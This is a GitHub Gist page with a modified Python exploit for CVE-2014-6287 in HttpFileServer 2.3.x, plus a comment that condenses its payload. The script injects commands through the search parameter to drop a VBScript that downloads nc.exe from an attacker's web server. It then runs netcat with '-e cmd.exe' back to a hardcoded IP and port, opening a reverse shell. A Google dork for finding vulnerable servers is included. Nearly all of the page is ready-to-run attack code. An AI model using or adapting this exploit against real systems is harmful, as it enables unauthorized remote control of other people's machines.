Last active
November 23, 2020 03:29
-
-
Save AfroThundr3007730/834858b381634de8417f301620a2ccf9 to your computer and use it in GitHub Desktop.
Modified version of CVE-2014-6287 python script found here: https://www.exploit-db.com/exploits/39161/
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution | |
# Google Dork: intext:"httpfileserver 2.3" | |
# Date: 04-01-2016 | |
# Remote: Yes | |
# Exploit Author: Avinash Kumar Thapa aka "-Acid" | |
# Vendor Homepage: http://rejetto.com/ | |
# Software Link: http://sourceforge.net/projects/hfs/ | |
# Version: 2.3.x | |
# Tested on: Windows Server 2008 , Windows 8, Windows 7 | |
# CVE : CVE-2014-6287 | |
# Description: You can use HFS (HTTP File Server) to send and receive files. | |
# It's different from classic file sharing because it uses web technology to be more | |
# compatible with today's Internet. It also differs from classic web servers because | |
# it's very easy to use and runs "right out-of-the box". Access your remote files, over | |
# the network. It has been successfully tested with Wine under Linux. | |
# Usage : python Exploit.py <Target IP address> <Target Port Number> | |
# EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/bin/nc.exe). | |
# You may need to run it multiple times for success! | |
import urllib2 as url | |
import sys | |
def main(): | |
try: | |
def script_create(): | |
url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + save + ".}") | |
def execute_script(): | |
url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + exe1 + ".}") | |
def nc_run(): | |
url.urlopen("http://" + rhost + ":" + rport + "/?search=%00{.+" + exe2 + ".}") | |
rhost = sys.argv[1] | |
rport = sys.argv[2] | |
lhost = "10.11.0.95" # local IP address | |
lport = "443" # Local Port number | |
save = "save|" + "C%3A%5CUsers%5CPublic%5Cscript.vbs|" + \ | |
"dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)" + \ | |
"%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)" + \ | |
"%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F" + lhost + \ | |
"%2Fbin%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm" + \ | |
"%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20." + \ | |
"open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20." + \ | |
"savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%20" + \ | |
"2%20%27%2F%2Foverwrite%0D%0Aend%20with" | |
exe1 = "exec|" + "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs" | |
exe2 = "exec|" + "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20" + \ | |
lhost + "%20" + lport | |
script_create() | |
execute_script() | |
nc_run() | |
except: | |
print "[-] Something went wrong..!" | |
print "[-] Usage is: python %s <Target IP address> <Target Port Number>" % sys.argv[0] | |
print "[-] Don't forget to change the Local IP address and Port number in the script." | |
sys.exit(-1) | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Thoughts on jamming in to 2 methods and updating execute_script:
vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F" + ip_addr + "%2Fnc64.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with%0D%0ASet%20objShell%20%3D%20CreateObject(%22WScript.Shell%22)%0D%0AobjShell.Exec(%22C%3A%5CUsers%5CPublic%5Cnc.exe%20-d%20" + ip_addr + "%20" +local_port+ "%20-e%20cmd.exe%22)"